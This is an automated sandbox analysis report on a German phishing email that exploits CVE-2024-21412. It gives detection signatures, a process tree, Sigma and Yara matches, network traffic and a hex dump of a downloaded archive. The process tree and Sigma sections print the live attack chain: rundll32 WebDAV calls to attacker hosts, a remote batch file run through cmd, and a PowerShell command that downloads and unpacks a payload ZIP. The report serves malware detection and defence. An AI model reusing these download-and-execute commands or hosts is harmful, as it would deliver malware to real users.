Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EXTERN Zahlungsbest#U00e4tigung.msg

Overview

General Information

Sample name:EXTERN Zahlungsbest#U00e4tigung.msg
renamed because original name is a hash value
Original sample name:EXTERN Zahlungsbesttigung.msg
Analysis ID:1484680
MD5:c5b5b77587dc74ae4ec2f8b65567fbea
SHA1:3de09091c51e128b3b524547c3a8c85d0e3a7c08
SHA256:679d02840a8f742969bd78e18e80cd98f5844ff4460d01b889972ed395377f7d
Infos:

Detection

CVE-2024-21412
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: rundll32 run dll from internet
Yara detected CVE-2024-21412
AI detected suspicious e-Mail
Chrome launches external ms-search protocol handler (WebDAV)
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Opens network shares
Powershell drops PE file
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 7112 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\EXTERN Zahlungsbest#U00e4tigung.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 1224 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "EA78F63D-11D0-470A-A737-D7B520A02F95" "4CE9D7BA-5FF5-4189-92A5-D6CD5249FA96" "7112" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6656 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1924,i,12067397372668068014,3130957219251823397,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6192 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rundll32.exe (PID: 8072 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/ MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 8128 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/ MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 7392 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/E_SCAN_DOC MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 3312 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 4020 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat MD5: EF3179D498793BF4234F708D3BE28633)
  • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • timeout.exe (PID: 936 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • powershell.exe (PID: 7940 cmdline: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3616 cmdline: powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • rundll32.exe (PID: 7848 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OpenWith.exe (PID: 876 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
    • Acrobat.exe (PID: 1976 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\E_TAX_DOC438093562789873345672_pdf.download" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6620 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 1164 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2272 --field-trial-handle=1576,i,1401745277560041960,6135997636573201547,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • rundll32.exe (PID: 408 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 1308 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
EXTERN Zahlungsbest#U00e4tigung.msgJoeSecurity_CVE_2024_21412Yara detected CVE-2024-21412Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.htmlJoeSecurity_CVE_2024_21412Yara detected CVE-2024-21412Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.htmlJoeSecurity_CVE_2024_21412Yara detected CVE-2024-21412Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.htmlJoeSecurity_CVE_2024_21412Yara detected CVE-2024-21412Joe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.htmlJoeSecurity_CVE_2024_21412Yara detected CVE-2024-21412Joe Security
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.htmlJoeSecurity_CVE_2024_21412Yara detected CVE-2024-21412Joe Security
              Click to see the 2 entries

              HTML

              SourceRuleDescriptionAuthorStrings
              0.0.pages.csvJoeSecurity_CVE_2024_21412Yara detected CVE-2024-21412Joe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Office Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                Sigma detected: Outlook Security Settings Updated - Registry
                Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3616, TargetFilename: C:\Users\user\Downloads\Python\Launcher\py.exe
                Sigma detected: PowerShell Web Download
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7896, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", ProcessId: 7940, ProcessName: powershell.exe
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7896, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", ProcessId: 7940, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7896, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }", ProcessId: 7940, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6192, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Sigma detected: rundll32 run dll from internet
                Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/, CommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7972, ProcessCommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/, ProcessId: 8072, ProcessName: rundll32.exe

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results
                Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/2SB9MLRC/Rechnung%20Nr.%2017735360.htmlHTTP Parser: No favicon
                Source: http://burrkeklprinting.tech:4098/new.batHTTP Parser: No favicon
                Source: http://burrkeklprinting.tech:4098/startuppp.batHTTP Parser: No favicon
                Source: http://burrkeklprinting.tech:4098/kyvbsa.pdfHTTP Parser: No favicon
                Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
                Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:62239 version: TLS 1.2

                Software Vulnerabilities

                barindex
                Yara detected CVE-2024-21412
                Source: Yara matchFile source: EXTERN Zahlungsbest#U00e4tigung.msg, type: SAMPLE
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html, type: DROPPED

                Networking

                barindex
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 116.203.169.52 ports 4098,0,4,8,9,7119
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 62240 -> 7119
                Source: unknownNetwork traffic detected: HTTP traffic on port 7119 -> 62240
                Source: unknownNetwork traffic detected: HTTP traffic on port 62259 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62259
                Source: unknownNetwork traffic detected: HTTP traffic on port 62259 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62260 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62259
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62260
                Source: unknownNetwork traffic detected: HTTP traffic on port 62262 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62263 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62264 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62262
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62263
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62264
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62261
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62266
                Source: unknownNetwork traffic detected: HTTP traffic on port 62266 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 62268 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62268
                Source: unknownNetwork traffic detected: HTTP traffic on port 62276 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62276
                Source: unknownNetwork traffic detected: HTTP traffic on port 62276 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62276
                Source: unknownNetwork traffic detected: HTTP traffic on port 62280 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62280
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62281
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62282
                Source: unknownNetwork traffic detected: HTTP traffic on port 62282 -> 4098
                Source: unknownNetwork traffic detected: HTTP traffic on port 4098 -> 62282
                Source: global trafficTCP traffic: 192.168.2.16:49727 -> 116.203.169.52:4098
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: global trafficTCP traffic: 192.168.2.16:62237 -> 162.159.36.2:53
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Length: 47545011Last-Modified: Tue, 30 Jul 2024 12:55:27 GMTContent-Type: application/x-zip-compressedDate: Tue, 30 Jul 2024 13:49:04 GMTETag: "a0697c7e4b0147aca880245f95e699c9-1722344127-47545011"Accept-Ranges: bytesServer: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1Data Raw: 50 4b 03 04 14 00 00 00 00 00 1b 42 ce 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 00 00 50 72 69 6e 74 2f 4c 61 75 6e 63 68 65 72 2f 50 4b 03 04 14 00 00 00 08 00 56 76 89 58 6e a0 8c d3 34 34 06 00 18 b1 0b 00 15 00 00 00 50 72 69 6e 74 2f 4c 61 75 6e 63 68 65 72 2f 70 79 2e 65 78 65 ec bd 7b 7c 14 45 b6 00 dc 93 4c c8 00 43 7a c0 89 8c 1a 21 40 d0 68 10 23 03 48 18 d0 f0 98 24 2a 81 09 31 13 10 13 58 17 e2 38 be 22 74 43 5c 09 04 3b b3 d2 16 ed 72 77 61 75 ef d5 bb b0 ea 5d 76 d7 dd c5 15 24 f8 c0 09 c1 3c 14 31 80 8b 28 e8 c6 5d 74 2b 0e 6a 80 18 06 09 e9 ef 9c aa ee c9 24 a0 7b ef f7 bb bf ef f7 fd 71 d1 74 57 57 9d 3a 75 ea d4 a9 f3 a8 aa ee 29 bc 6b a3 90 28 08 82 15 fe 74 5d 10 ea 04 fe 2f 57 f8 d7 ff 1c 16 41 48 19 f9 5a 8a b0 63 e0 7b a3 ea 2c 73 de 1b 75 67 e0 be 15 e9 95 cb 1f be 77 f9 8f 1e 4c ff f1 8f 1e 7a e8 61 29 fd 9e 65 e9 cb e5 87 d2 ef 7b 28 7d f6 bc e2 f4 07 1f 5e ba 6c fc 90 21 83 32 0c 1c 2b 27 4f 9e 33 a1 74 c1 48 f3 ef d1 1b 17 8d 98 c2 ee 65 23 5e 64 f7 bb 47 5c 03 f7 89 47 ca 46 38 d9 fd ee 11 e9 ec be 88 e5 7b 6e 7c 77 64 36 83 5b 38 62 12 c3 b1 70 e4 2c b8 97 1d f1 8d 70 b3 fb 6f 47 f2 fb 5d ec 79 fe 7d 3f 0e 60 3b df d7 27 9f 57 10 e6 58 92 84 ad f9 a9 15 66 5e 9b 90 60 19 6c 49 b9 46 b8 3c 41 10 96 0f 64 79 29 41 b8 38 e0 2f 1b f2 90 5b 98 86 e4 00 a3 8e 79 17 c2 83 19 73 3b 3f 1d 0c 7c ce 5d c7 00 11 36 76 8f dd d8 bf 4d 2d 09 c2 52 96 4a 14 ea fe d3 d6 5b f0 f8 60 c1 75 23 dc b7 0c 16 e8 e5 82 50 f0 46 82 70 a7 f0 fd ff d6 bf 9e d0 77 0c 81 ce 6d 96 ef 01 86 7f e3 a5 65 55 12 dc 7f ec 4c e0 04 61 5f ad 7d 61 d2 05 61 c9 f8 e5 4b 7f 24 fd 48 10 d6 3c 2f f0 be bf 00 f7 2b 13 fa c0 e5 c2 ff e3 39 18 e0 81 bf 36 28 b7 c3 7d cf 45 70 e1 f1 cb 57 2c ff 31 a4 79 5f 41 12 b7 c0 fd 9d 4b e0 5b be ec 81 87 01 10 fb 8e 3c 10 5c 70 0f 0e ee 0f 37 53 f8 bf 7f ff a3 7f 75 d1 6f 67 0a 0d fb 63 ff ea 3a fa 3e 97 90 93 ca 89 a8 e6 75 f8 82 82 2e db 75 d9 46 5b 74 f8 57 69 d5 b3 e9 d3 c7 05 41 d9 